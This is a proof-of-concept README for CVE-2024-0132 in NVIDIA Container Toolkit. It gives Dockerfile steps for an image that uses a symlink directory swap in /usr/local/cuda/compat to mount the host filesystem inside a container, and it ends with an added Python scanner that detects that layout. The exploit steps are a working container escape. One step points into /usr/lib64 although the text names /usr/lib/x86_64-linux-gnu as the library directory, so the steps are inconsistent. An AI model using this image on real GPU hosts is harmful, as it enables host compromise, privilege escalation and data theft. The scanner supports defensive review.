CVE-2024-0132 PoC — NVIDIA Container Toolkit Security Vulnerability

Associated Vulnerability
Title: NVIDIA Container Toolkit Security Vulnerability (CVE-2024-0132)
Description: NVIDIA Container Toolkit 1.16.1 or earlier contains a Time-of-check Time-of-Use (TOCTOU) vulnerability when used with default configuration, where a specifically crafted container image may gain access to the host file system. This does not impact use cases where CDI is used. A successful exploit of this vulnerability may lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.
Description
CVE-2024-0132 – Fully Weaponized NVIDIA Container Toolkit Exploit
Readme
# CVE-2024-0132
CVE-2024-0132 PoC

Let's start by choosing a base image, because the location of the system library directory depends on it: for `alpine` it is `/usr/lib64/`, for `ubuntu` it is `/usr/lib/x86_64-linux-gnu`. We will use `ubuntu` as the base image.

```dockerfile
FROM ubuntu
```

The NVIDIA Container Toolkit checks the libraries in `/usr/local/cuda/compat/` inside the container and then mounts them into the main library directory, which for this image (`ubuntu`) is `/usr/lib/x86_64-linux-gnu`.

Symbolic links are mounted as well, so any file or directory from the image can be mounted into `/usr/lib/x86_64-linux-gnu`. The toolkit checks that a link resolves inside the container, so a chain of `../` cannot be used for path traversal directly. The check can be circumvented, however, by going through the in-container mount from `/usr/local/cuda/compat/` twice: the path is checked once and mounted later, hence the TOCTOU.

Read more about the mechanism for mounting from `/usr/local/cuda/compat/`:

- https://github.com/NVIDIA/libnvidia-container/blob/4c2494f16573b585788a42e9c7bee76ecd48c73d/src/nvc_container.c#L61
- https://github.com/NVIDIA/libnvidia-container/blob/4c2494f16573b585788a42e9c7bee76ecd48c73d/src/nvc_mount.c#L768

```dockerfile
RUN mkdir -p /usr/local/cuda/compat/
```

Create two directories:
1. The original directory will contain a regular file with the contents `test`

```dockerfile
RUN mkdir -p /usr/lib/x86_64-linux-gnu/libdxcore.so.1337/
RUN echo test > /usr/lib/x86_64-linux-gnu/libdxcore.so.1337/libdxcore.so.1337.hostfs
```

2. The second directory, with the same name, will contain a path-traversal link instead of a file.

```dockerfile
RUN mkdir -p /pwn/libdxcore.so.1337/
RUN ln -s ../../../../../../../../../ /pwn/libdxcore.so.1337/libdxcore.so.1337.hostfs
```

The name `libdxcore.so` is chosen to pass the toolkit's name filters. The major version (1337) must differ from the real driver version.

Create two links in `/usr/local/cuda/compat/`:
1. The first link replaces the contents of the original directory `/usr/lib/x86_64-linux-gnu/libdxcore.so.1337/` with those of `/pwn/libdxcore.so.1337/`

```dockerfile
RUN ln -s /pwn/libdxcore.so.1337 /usr/local/cuda/compat/libxxx.so.1
```

2. The second link mounts `/usr/lib/x86_64-linux-gnu/libdxcore.so.1337/libdxcore.so.1337.hostfs` onto `/usr/lib/x86_64-linux-gnu/libdxcore.so.1337.hostfs`. At check time this path is a regular file, but by the time the mount happens the directory has been replaced, so the path is now the traversal link from `/pwn/libdxcore.so.1337/libdxcore.so.1337.hostfs`, and the host filesystem ends up mounted at `/usr/lib/x86_64-linux-gnu/libdxcore.so.1337.hostfs/`.

```dockerfile
RUN ln -s /usr/lib64/libdxcore.so.1337/libdxcore.so.1337.hostfs /usr/local/cuda/compat/libxxx.so.2
```
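
As an added example (not part of the PoC repository or of the toolkit), a Python pre-admission check for images headed to GPU hosts: it walks an image rootfs already unpacked on disk, resolves every `/usr/local/cuda/compat/` entry the way a process inside the container would see it, and re-resolves any entry whose link target runs through a directory that another entry would overlay in the library directory, which is the directory swap described above. The mount-destination rule (library directory plus the basename of the resolved target) is inferred from the two-link description above and is an assumption, and `build_sample()` creates a constructed rootfs with that layout for demonstration.

```python
import os
import tempfile
from pathlib import Path

COMPAT = "usr/local/cuda/compat"      # directory the toolkit scans (from the page)
LIBDIR = "usr/lib/x86_64-linux-gnu"  # library directory of an ubuntu base (from the page)

def resolve_in_rootfs(root, path, max_hops=40):
    """Resolve `path` as the container sees it (`root` acts as '/'); escaped = '..' climbed above '/'."""
    root, hops, escaped = Path(root).resolve(), 0, False
    cur, parts = root, [p for p in path.split("/") if p not in ("", ".")]
    while parts:
        part = parts.pop(0)
        if part == "..":
            escaped, cur = escaped or cur == root, cur if cur == root else cur.parent
            continue
        nxt = cur / part
        if not nxt.is_symlink():
            cur = nxt
            continue
        if (hops := hops + 1) > max_hops:
            raise RuntimeError(f"symlink loop at {nxt}")
        target = os.readlink(nxt)
        cur = root if target.startswith("/") else cur  # absolute target restarts at '/'
        parts = [p for p in target.split("/") if p not in ("", ".")] + parts
    return "/" + "/".join(cur.relative_to(root).parts), escaped

def scan_compat(root):
    """Flag compat entries whose link target runs through a directory another entry would overlay."""
    root, findings = Path(root), []
    entries = sorted((root / COMPAT).iterdir()) if (root / COMPAT).is_dir() else []
    info = {e.name: resolve_in_rootfs(root, f"/{COMPAT}/{e.name}") for e in entries}
    dests = {n: (r, f"/{LIBDIR}/{os.path.basename(r)}") for n, (r, _) in info.items()}  # assumed mount destination
    for e in entries:
        raw = os.readlink(e) if e.is_symlink() else ""
        for n, (target, dest) in dests.items():
            if n != e.name and raw.startswith(dest + "/"):
                swapped, esc = resolve_in_rootfs(root, target + raw[len(dest):])
                findings.append(f"{e.name}: passes through {dest}, overlaid by {n}; after the swap it resolves to {swapped}, escapes={esc}")
    return findings

def build_sample():  # constructed sample rootfs mirroring the layout above, not a real image
    root = Path(tempfile.mkdtemp())
    for d in (COMPAT, f"{LIBDIR}/libdxcore.so.1337", "pwn/libdxcore.so.1337"):
        (root / d).mkdir(parents=True)
    (root / LIBDIR / "libdxcore.so.1337/libdxcore.so.1337.hostfs").write_text("test\n")
    os.symlink("../../../../../../../../../", root / "pwn/libdxcore.so.1337/libdxcore.so.1337.hostfs")
    os.symlink("/pwn/libdxcore.so.1337", root / COMPAT / "libxxx.so.1")
    os.symlink(f"/{LIBDIR}/libdxcore.so.1337/libdxcore.so.1337.hostfs", root / COMPAT / "libxxx.so.2")
    return root
```

Run `scan_compat("/path/to/unpacked/rootfs")` against an image unpacked with your usual tooling; a non-empty result is a reason to refuse the image on hosts running toolkit 1.16.1 or earlier without CDI.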